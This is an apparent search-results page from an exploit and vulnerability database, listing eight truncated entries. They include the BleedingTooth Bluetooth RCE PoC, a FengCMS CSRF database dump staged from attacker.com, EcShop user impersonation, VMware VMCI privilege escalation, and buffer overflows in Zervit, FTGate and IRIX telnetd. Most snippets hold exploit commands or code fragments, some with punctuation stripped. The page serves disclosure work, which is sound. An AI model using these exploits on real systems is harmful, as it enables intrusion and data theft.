8 matches found
EUVD-2025-18669
Malicious code in bioql PyPI...
Linux Kernel 5.4 BleedingTooth Remote Code Execution
/ BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution by Andy Nguyen theflow@ This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352. Compile using: $ gcc -o exploit exploit.c -lbluetooth and execute as: $ sudo ./exploit targetmac sourceip sourceport ...
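FengCMS CSRF vulnerability can lead to the database being dumped
Brief description: A critical function does not validate a CSRF token, so the database can be dumped. Details: The data backup function in the admin backend does not validate a CSRF token. The attacker creates a csrf.php with the following content and places it on attacker.com: The attacker then sends the URL http://attacker.com/csrf.php to the victim (the site administrator). If the administrator is logged in when opening that URL, a request to back up the database is sent to the target server with the administrator's identity: ?controller=dbmanage&operate=save&type=0...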
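EcShop: impersonating any user to post product comments; put to use, this can manipulate an online shop's public opinion
Brief description: A logged-in user can impersonate any other registered user to post comments on any product; put to use, this can manipulate an online shop's public opinion. Details: The vulnerable code is at line 287 of comment.php: $username = empty($cmt->username) ? $_SESSION['username'] : trim($cmt->username); $cmt is a JSON data structure, assigned at line 37 of comment.php: $cmt = $json->decode($_REQUEST['cmt']); As this shows, a user only has to submit JSON containing "username":"any user account" to impersonate any user when commenting on a given product! Proof of vulnerability:...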
VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'
/ CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 / void stdcall FireShellDWORD dwSomeParam EscalatePrivilegeshProcessToElevate; // Equate the stack and quit the cycle ifndef AMD64 asm pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 endif HANDLE...
Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)
Zervit Web Server 0.02 - Remote Buffer Overflow PoC Zervit Webserver 0.02 Buffer Overflow By: e.wiZz! Site: www.balcansecurity.com Found with ServMeNot world's sexiest fuzzer :P In the wild... Vend0r site: http://www.ohloh.net/projects/mereo / When requested uri isn't found,it goes to char tmp255...
FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)
FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow PoC !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host,...
irix.telnetd.txt
We've found a very severe vulnerability in the IRIX telnetd service that upon successful exploitation can give remote root access to any IRIX 6.2-6.5.8m,f system. The bug discussed here appeared in IRIX 5.2-6.1 systems and was the result of SGI efforts to patch a security vulnerability reported b...